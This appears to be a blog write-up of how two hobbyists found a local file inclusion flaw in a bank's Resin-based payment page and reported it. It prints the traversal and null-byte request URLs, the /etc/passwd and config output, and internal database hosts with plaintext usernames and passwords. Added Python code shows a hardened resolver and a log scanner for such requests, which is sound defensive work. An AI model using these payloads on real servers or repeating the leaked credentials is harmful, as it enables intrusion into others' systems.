The story of one penetration
Topics about catching hackers made me write this post.
I want to share with you the story that happened to me a few years ago.
I must say right away that my hobby is web application security.
While idly browsing the Internet, my friend found a site for sending free SMS to numbers of Ukrainian operators. There we found a small vulnerability related to bypassing the Turing test (captcha).
Since my friend and I like looking for vulnerabilities, we played a game: which of us would bypass the captcha faster.
But today's story is not about that, but about what we discovered later.
One day, while looking at the source code of a page of the free SMS site, my friend discovered an interesting piece of HTML:
<a HREF="#" onClick="javascript:window.open('https://hackbank.ua/test.php?code=MOBILE&state=2&xslt_url=service_host.xsl', 'quickpay', 'toolbar=0,status=0,menubar=0,scrollbars=0,width=650,height=400', false);" CLASS="header"><img SRC="www.sms1.ua/img/topupeasy.jpg" WIDTH="82" HEIGHT="34" ALT="Пополняй легко!" BORDER="0" VSPACE="0"></a>
The link, which apparently loads a file from the server, was of great interest to us.
In less than 5 minutes, we discovered a Local File Inclusion vulnerability. It was in the following link:
hackbank.ua/test.php?code=MOBILE&state=2&xslt_url=<local_file>
Using this vulnerability, you can read local files directly in the browser.
We made a request to the server for a nonexistent file, and here's what we got:
Request for url:
hackbank.ua/test?&xslt_url=0
The server response was something like this:
500 Servlet Exception
...........................
Resin-3.0.s060216 (built Thu, 16 Feb 2006 09:17:50 PST)
Honestly, that was the first time I had heard of Resin.
Resin is a high-performance application server with features such as scalability and load balancing.
Product information we found on Wikipedia at the time:
Logo: Caucho Technology, Inc.
Type: Application server
Developer: Caucho Technology, Inc.
OS: Cross-platform software
Current version: 3.1.1 (May 2007)
License: GPL / Proprietary software
Website: www.caucho.com (in English)
(Information from Wikipedia)
After downloading the software, we started studying it. Here is the Resin folder structure:
│   configure
│   httpd.exe
│   LICENSE
│   Makefile.in
│   README
│   setup.exe
│
├───automake
│       config.guess
│       config.sub
│       install-sh
│       ltmain.sh
│       missing
│
├───bin
│       httpd.sh
│
├───conf
│       app-default.xml
│       development.conf
│       fine.conf
│       minimal.conf
│       password.xml
│       resin-3_1.conf
│       resin-admin.xml
│       resin.conf
│
├───contrib
│       init.resin-iptables
│       init.resin.in
│
├───lib
│       activation.jar
│       eclipse-compil
Now let's get back to the vulnerability.
Let's start with the classic: using the link hackbank.ua/test?xslt_url=../../../../../../etc/passwd
we get the following output:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
ident:x:100:101::/home/ident:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Servic
Then we started looking for where the Resin server's conf folder was stored locally, and we found it pretty quickly. The config is an XML file, which was available at hackbank.ua/test?xslt_url=../../../../../../conf/resin.conf%00
%00 is a null byte; it tells the server that this is the end of the string, so anything the application appends after it is ignored.
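As an added illustration, not code from the site or from Resin, here is a Python emulation of the unchecked xslt_url handling next to a hardened resolver that a defender would put in its place; the directory XSL_DIR and the allowlist are assumptions.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Assumed stylesheet directory for this demo; the real site's layout is not known.
XSL_DIR = "/opt/resin/webapps/ROOT/xsl"

def resolve_naive(xslt_url: str) -> str:
    """Emulates the handling behind hackbank.ua/test?xslt_url=...: the decoded value is
    joined straight onto the stylesheet directory with no validation, so '../' walks out
    of it. The split emulates a C-backed file API (as in older JVMs) that stops reading
    the name at the first NUL byte, which is why %00 cuts off anything appended after it."""
    name = unquote(xslt_url)
    path = os.path.join(XSL_DIR, name).split("\0", 1)[0]
    return os.path.normpath(path)

def resolve_safe(xslt_url: str, allowed=("service_host.xsl",)) -> Optional[str]:
    """Hardened resolution: decode, reject NUL bytes and path separators, accept only an
    allowlisted stylesheet name, and check that the canonical path still lies inside
    XSL_DIR. Returns None when the request must be refused (the caller should log it)."""
    name = unquote(xslt_url)
    if "\0" in name or "/" in name or "\\" in name:
        return None
    if name not in allowed:
        return None
    base = os.path.realpath(XSL_DIR)
    path = os.path.realpath(os.path.join(base, name))
    # Belt and braces: even with an allowlist, confirm containment of the final path.
    if os.path.commonpath([base, path]) != base:
        return None
    return path

if __name__ == "__main__":
    for value in ("service_host.xsl", "../../../../../../etc/passwd",
                  "../../../../../../conf/resin.conf%00"):
        print(f"{value!r:45} naive -> {resolve_naive(value)}  safe -> {resolve_safe(value)}")
```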
Next, we looked at the source of the resulting file:
xmlns:resin="caucho.com/ns/resin/core" xmlns="caucho.com/ns/resin">
port="1080"/>
port="10443">
JKS
keys/hackbank.jks
fynbxfn
6645b
SSL
id="" root-directory=".">
path="log/access.log" format="%h %l %u %t "%r" %s %b "%i" "%i"" rollover-period="1W"/>
path="log/stderr.log" timestamp="[%Y.%m.%d %H:%M:%S.%s] " rollover-period="1W"/>
path="log/stdout.log" rollover-period="1W"/>
path="log/server.log" timestamp="[%Y.%m.%d %H:%M:%S.%s] " rollover-period="1W"/>
id="/" document-directory="webapps/ROOT"/>
path="deploy">
ejb-server-jndi-name="java:comp/env/ejb">
jndi-name="java:comp/env/ejb"/>
path="webapps"/>
path="deploy"/>
path="deploy"/>
path="$/conf/db-pool.xml"/>
path="$/conf/c2b-db-pool.xml"/>
path="$/conf/db-pool-qp.xml"/>
path="$/conf/hb-default.xml"/>
path="$/conf/resin-status.xml"/>
path="$/conf/resin-common.xml"/>
Here are all the web server logs:
hackbank.ua/test?xslt_url=../../../../../../log/access.log
hackbank.ua/test?xslt_url=../../../../../../log/stderr.log
hackbank.ua/test?xslt_url=../../../../../../log/server.log
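Those same logs are where a defender would have spotted this activity. As an added example, not part of the original post, here is a scanner for the access-log format declared in the leaked resin.conf, run over constructed sample lines that mirror the requests above.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Matches the access-log format from the leaked resin.conf:
#   %h %l %u %t "%r" %s %b "%i" "%i"   (the two trailing header fields are not needed here)
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+)'
)

# Constructed sample lines modelled on the requests in the post; not real log data.
SAMPLE_LOG = [
    '10.0.0.7 - - [12/Mar/2009:10:15:02 +0200] "GET /test.php?code=MOBILE&state=2&xslt_url=service_host.xsl HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2009:10:16:40 +0200] "GET /test?xslt_url=../../../../../../etc/passwd HTTP/1.1" 200 2261 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2009:10:17:05 +0200] "GET /test?xslt_url=../../../../../../conf/resin.conf%00 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2009:10:18:11 +0200] "GET /test?&xslt_url=0 HTTP/1.1" 500 912 "-" "Mozilla/5.0"',
]

def suspicious_xslt_url(value: str):
    """Return why a decoded xslt_url value looks like a file-inclusion attempt, or None."""
    v = unquote(value)  # parse_qs decoded once; a second pass also catches %2500-style double encoding
    if "\0" in v:
        return "null byte"
    if v.startswith(("/", "\\")):
        return "absolute path"
    if ".." in v.replace("\\", "/").split("/"):
        return "directory traversal"
    return None

def scan_access_log(lines):
    """Return (host, request line, reason) for every request whose xslt_url is suspicious."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        request = m.group("request")
        parts = request.split(" ")          # METHOD PATH PROTOCOL
        if len(parts) < 2:
            continue
        query = urlsplit(parts[1]).query
        for value in parse_qs(query, keep_blank_values=True).get("xslt_url", []):
            reason = suspicious_xslt_url(value)
            if reason:
                hits.append((m.group("host"), request, reason))
    return hits

if __name__ == "__main__":
    for host, request, reason in scan_access_log(SAMPLE_LOG):
        print(f"{host}: {reason}: {request}")
```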
We did not find anything interesting there. But we went further :)
File ../../../../../../conf/c2b-db-pool.xml%00 :
10.1.101.195:5000
-----------------
user : C2BServer
password : vsirfysy
10.1.100.105:5000
-----------------
user : C2BServer
password : lfktrbq,thtu
10.1.100.115:5000
----------------
user : jbkl
password : 123456
File ../../../../../../conf/db-pool.xml%00 :
10.1.101.51:5000
-------------------
user : е16_jag
password : u4BKoc7U5Edo
10.1.100.77:5000
-------------------
user : hskl
password : hsklhskl
10.1.99.49:4100
------------------
user : wbpfo_p424
password : aUKlOfcvT4YmAnk
10.1.99.82:5000
------------------
user : P24CVC
password : Login_4_P424CVC
Guess what it is? That's right, this is access to other servers of the bank’s internal network :)
The next day we wrote a letter describing all the vulnerabilities we had managed to find and sent it to the bank's mail address. After 3 weeks the vulnerabilities were still present. We sent the letter again, and a week later, to our joy, our vulnerabilities had been fixed.
With this article we did not want to offend anyone, we just want to inform the world that there are no secure systems. Hire professionals to audit your information systems.
For all questions, please contact vadim@g-sg.net
* Attention! All links, as well as the name of the bank, were changed for reasons of anonymity *
Thanks for your attention!
UPD: Please report any errors in the text via private message. Thanks!